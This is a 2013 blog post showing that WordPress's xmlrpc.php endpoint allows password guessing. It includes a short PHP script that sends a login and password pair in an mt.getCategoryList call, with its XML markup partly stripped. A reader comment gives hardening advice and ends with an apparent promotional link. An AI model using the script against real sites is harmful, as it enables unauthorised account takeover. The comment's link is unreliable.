Saturday, April 13, 2013

Wordpress password guessing with xmlrpc.php

Recently wordpress powered websites are under a password guessing attack. Since everyone writes about /wp-login.php and /wp-admin and gives tips how to protect these files I'd like to mention that xmlrpc.php file (XML-RPC wordpress "handler") also allows attacker to perform credentials guessing.

I've written simple script in PHP that check if login/password pair is valid via xmlrpc mt.getCategoryList method (however other methods also have login and passwords parameters, just look inside wp-includes/class-wp-xmlrpc-server.php)
<?php

function wp_xmlrpc_test($url = 'http://www.wordpress.org/xmlrpc.php', $login = 'admin', $password = 'admin') {

    $xml = '<?xml version="1.0" encoding="utf-8"?>
    
    mt.getCategoryList
    
    -1
    '.$login.'admin
    '.$password.'
    
    ';

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);

    $uri = parse_url($url);
 
    $header[] = "Host: ".$uri['host'];
    $header[] = "Content-type: text/xml";
    $header[] = "Content-length: ".mb_strlen($xml);

    curl_setopt( $ch, CURLOPT_URL, $url);
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt( $ch, CURLOPT_HTTPHEADER, $header);
    curl_setopt( $ch, CURLOPT_POSTFIELDS, $xml);
    curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'POST');

    $result = curl_exec($ch);

    curl_close($ch);

    return $result;
}

var_dump( wp_xmlrpc_test('http://www.wordpress.org/xmlrpc.php') );
PS. There is even method for fetching available methods (mt.supportedMethods) :)

1 comment:

  1. In case you are not aware (sorry if you already know this), but XMLPRC is used for posting content remotely. The xmlrpc.php file is what Wordpress uses to allow you to post remotely.

    As you know, one of the things we all love about Wordpress is how easy it is to create new websites and to manage the content. These are the very same reasons why hackers also love Wordpress.

    If you are not posting comments to your website remotely, one of the quickest way to get yourself out of this situation is to rename the xmlrpc.php file to some fictitious name. Make sure you change the file type to anything other than “.php.” This way, you will remove the possibility that the server may accidentally run the code.

    If you are doing posts remotely, here’s some code you can add to your .htaccess file:


    order deny,allow
    deny from all
    allow from 123.456.789.123 allow {where “123.456.789.123” is the IP address of the computer that can use xmlrpc.pgp}


    Wordpress has a bunch of security holes and we have been victimized many times. I a solution that so far has helped me secure our sites more than anything else we have tried.

    Here is the link ==> http://jvz8.com/c/9278/20094

    Hopefully, Wordpress will not open up new holes with the next WP update

    ReplyDelete